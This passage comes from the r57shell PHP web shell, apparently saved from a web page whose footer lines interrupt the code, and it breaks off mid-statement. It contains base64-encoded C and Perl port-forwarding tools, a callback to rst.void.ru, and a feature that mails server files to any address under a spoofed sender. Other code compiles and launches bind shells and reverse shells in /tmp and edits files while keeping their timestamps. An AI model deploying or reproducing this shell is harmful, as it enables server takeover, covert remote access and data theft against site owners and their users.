$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlI DxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2lu Y2x1ZGUgPGVycm5vLmg+DQojaW5jb 
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoja WZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVma W5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5k ZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBj aGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3R ydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyL CBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogI HVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCBy ZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGl mICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQ ogICAgcGVycm9yKGFyZ3ZbM10pOw0KICAfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  29. 29. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHR vbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl QUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0ga HRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2 YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIH BlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZv cmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj c29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KIC AgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7 DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQg PT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H KSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQ UFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ29 0byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG 1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob 2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0 MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRz cik7DQogICAgRkRfU0VUKGNzb2NrLC 
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogIC AgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q 6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fC BGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7 DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZ kc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290by BxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0M joNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7 DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQ gPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  30. 30. mRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IF BPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJG hvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4n ID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YW NjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZW QoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0p OyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2 tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBle Gl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInf S90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggf HwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aC ksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNC mlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwg ZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlci wgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKS B7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB 
TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHBya W50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Zm ZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbi I7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik 7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19 DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmF uZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24ua HJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3Jpc HQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmF FbmFibGVkKCk/IlkiOiJOIik8Lfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  31. 31. 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSI md2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWl jIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdG xvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50L ndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0L mhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwv c2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ 0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjw vYT48L25vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0K ZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZy BzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT 09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2x vckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx 6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc 2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+"; if($unix) { if(!isset($_COOKIE[uname])) { $uname = ex(uname -a); setcookie(uname,$uname); } else { $uname = $_COOKIE[uname]; } if(!isset($_COOKIE[id])) { $id = ex(id); setcookie(id,$id); } else { $id = $_COOKIE[id]; } if($safe_mode) { $sysctl = -; } else if(isset($_COOKIE[sysctl])) { $sysctl = $_COOKIE[sysctl]; } else { $sysctl = 
ex(sysctl -n kern.ostype && sysctl -n kern.osrelease); if(empty($sysctl)) { $sysctl = ex(sysctl -n kernel.ostype && sysctl -n kernel.osrelease); } if(empty($sysctl)) { $sysctl = -; } setcookie(sysctl,$sysctl); } } echo $head; echo </head>; if(empty($_POST[cmd])) { $serv = array(127,192,172,10); $addr=@explode(., $_SERVER[SERVER_ADDR]); $current_version = str_replace(.,,$version); if (!in_array($addr[0], $serv)) { @print "<img src="http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."" border=0 height=0 width=0>";file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  32. 32. @readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} echo <body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>.ws(2).<font face=Webdings size=6><b>!</b></font><b>.ws(2).r57shell .$version.</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>; echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?phpinfo title="".$lang[$language._text46].""><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?phpini title="".$lang[$language._text47].""><b>php.ini</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?cpu title="".$lang[$language._text50].""><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?mem title="".$lang[$language._text51].""><b>mem</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?users title="".$lang[$language._text95].""><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?tmp title="".$lang[$language._text48].""><b>tmp</b></a> ".$rb; echo ws(2).$lb." 
<a href=".$_SERVER[PHP_SELF]."?delete title="".$lang[$language._text49].""><b>delete</b></a> ".$rb."<br>"; echo ws(2)."safe_mode: <b>"; echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); echo "</b>".ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists(curl_version); echo ws(2); echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); echo "</b>".ws(2); echo "MySQL: <b>"; $mysql_on = @function_exists(mysql_connect); if($mysql_on){ echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo "</b>".ws(2); echo "MSSQL: <b>"; $mssql_on = @function_exists(mssql_connect); if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b>".ws(2); echo "PostgreSQL: <b>"; $pg_on = @function_exists(pg_connect); if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b>".ws(2); echo "Oracle: <b>"; $ora_on = @function_exists(ocilogon); if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b><br>".ws(2); echo "Disable functions : <b>"; if(==($df=@ini_get(disable_functions))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;}file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  33. 33. echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>"; echo </font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>; echo $font; if($unix){ echo <font color=blue><b>uname -a :.ws(1).<br>sysctl :.ws(1).<br>$OSTYPE :.ws(1).<br>Server :.ws(1).<br>id :.ws(1).<br>pwd :.ws(1).</b></font><br>; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); echo ws(3).$sysctl."<br>"; echo ws(3).ex(echo $OSTYPE)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; if(!empty($id)) { echo ws(3).$id."<br>"; } else if(function_exists(posix_geteuid) && function_exists(posix_getegid) && function_exists(posix_getgrgid) && function_exists(posix_getpwuid)) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).uid=.$euserinfo[uid]. ( .$euserinfo[name]. ) gid=.$egroupinfo[gid]. ( .$egroupinfo[name]. )<br>; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; echo ws(3).$dir; echo ws(3).( .perms(@fileperms($dir)). 
); echo "</b></font>"; } else { echo <font color=blue><b>OS :.ws(1).<br>Server :.ws(1).<br>User :.ws(1).<br>pwd :.ws(1).</b></font><br>; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo ws(3).@substr(@php_uname(),0,120)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; echo ws(3).@getenv("USERNAME")."<br>"; echo ws(3).$dir; echo "<br></font>"; } echo "</font>"; echo "</td></tr></table>"; if(empty($c1)||empty($c2)) { die(); } $f = <br>; $f .= base64_decode($c1); $f .= base64_decode($c2); if(!empty($_POST[cmd]) && $_POST[cmd]=="mail") { $res = mail($_POST[to],$_POST[subj],$_POST[text],"From: ".$_POST[from]."rn"); err(6+$res); $_POST[cmd]=""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="mail_file" && !empty($_POST[loc_file])) { if(!$file=@fopen($_POST[loc_file],"r")) { err(1,$_POST[loc_file]); $_POST[cmd]=""; } elsefile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  34. 34. { $filename = @basename($_POST[loc_file]); $filedump = @fread($file,@filesize($_POST[loc_file])); fclose($file); $content_encoding=$mime_type=; compress($filename,$filedump,$_POST[compress]); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST[subj])) { $_POST[subj] = file from r57shell; } if(empty($_POST[from])) { $_POST[from] = billy@microsoft.com; } $res = mailattach($_POST[to],$_POST[from],$_POST[subj],$attach); err(6+$res); $_POST[cmd]=""; } } if(!empty($_POST[cmd]) && $_POST[cmd] == "find_text") { $_POST[cmd] = find .$_POST[s_dir]. -name .$_POST[s_mask]. | xargs grep -E .$_POST[s_text].; } if(!empty($_POST[cmd]) && $_POST[cmd]=="ch_") { switch($_POST[what]) { case own: @chown($_POST[param1],$_POST[param2]); break; case grp: @chgrp($_POST[param1],$_POST[param2]); break; case mod: @chmod($_POST[param1],intval($_POST[param2], 8)); break; } $_POST[cmd]=""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="mk") { switch($_POST[what]) { case file: if($_POST[action] == "create") { if(file_exists($_POST[mk_name]) || !$file=@fopen($_POST[mk_name],"w")) { err(2,$_POST[mk_name]); $_POST[cmd]=""; } else { fclose($file); $_POST[e_name] = $_POST[mk_name]; $_POST[cmd]="edit_file"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text61]."</b></font></div></td></tr></table>"; }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  35. 35. } else if($_POST[action] == "delete") { if(unlink($_POST[mk_name])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=- 2><b>".$lang[$language._text63]."</b></font></div></td></tr></table>"; $_POST[cmd]=""; } break; case dir: if($_POST[action] == "create"){ if(mkdir($_POST[mk_name])) { $_POST[cmd]=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text62]."</b></font></div></td></tr></table>"; } else { err(2,$_POST[mk_name]); $_POST[cmd]=""; } } else if($_POST[action] == "delete"){ if(rmdir($_POST[mk_name])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=- 2><b>".$lang[$language._text64]."</b></font></div></td></tr></table>"; $_POST[cmd]=""; } break; } } if(!empty($_POST[cmd]) && $_POST[cmd]=="edit_file" && !empty($_POST[e_name])) { if(!$file=@fopen($_POST[e_name],"r+")) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST[e_name],"r")) { err(1,$_POST[e_name]); $_POST[cmd]=""; } else { echo $table_up3; echo $font; echo "<form name=save_file method=post>"; echo ws(3)."<b>".$_POST[e_name]."</b>"; echo "<div align=center><textarea name=e_text cols=121 rows=24>"; echo @htmlspecialchars(@fread($file,@filesize($_POST[e_name]))); fclose($file); echo "</textarea>"; echo "<input type=hidden name=e_name value=".$_POST[e_name].">"; echo "<input type=hidden name=dir value=".$dir.">"; echo "<input type=hidden name=cmd value=save_file>"; echo (!empty($only_read)?("<br><br>".$lang[$language._text44]):("<br><br><input type=submit name=submit value=" ".$lang[$language._butt10]." 
">")); echo "</div>"; echo "</font>"; echo "</form>"; echo "</td></tr></table>"; exit(); } } if(!empty($_POST[cmd]) && $_POST[cmd]=="save_file")file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  36. 36. { $mtime = @filemtime($_POST[e_name]); if(!$file=@fopen($_POST[e_name],"w")) { err(0,$_POST[e_name]); } else { if($unix) $_POST[e_text]=@str_replace("rn","n",$_POST[e_text]); @fwrite($file,$_POST[e_text]); @touch($_POST[e_name],$mtime,$mtime); $_POST[cmd]=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text45]."</b></font></div></td></tr></table>"; } } if (!empty($_POST[port])&&!empty($_POST[bind_pass])&&($_POST[use]=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST[port]." ".$_POST[bind_pass]." &"); $_POST[cmd]="ps -aux | grep bd"; } if (!empty($_POST[port])&&!empty($_POST[bind_pass])&&($_POST[use]=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2." /tmp/bdpl ".$_POST[port]." &"); $_POST[cmd]="ps -aux | grep bdpl"; } if (!empty($_POST[ip]) && !empty($_POST[port]) && ($_POST[use]=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); $blah = ex($p2." /tmp/back ".$_POST[ip]." ".$_POST[port]." &"); $_POST[cmd]="echo "Now script try connect to ".$_POST[ip]." port ".$_POST[port]." ...""; } if (!empty($_POST[ip]) && !empty($_POST[port]) && ($_POST[use]=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST[ip]." ".$_POST[port]." &"); $_POST[cmd]="echo "Now script try connect to ".$_POST[ip]." port ".$_POST[port]." ...""; } if (!empty($_POST[local_port]) && !empty($_POST[remote_host]) && !empty($_POST[remote_port]) && ($_POST[use]=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); $blah = ex($p2." 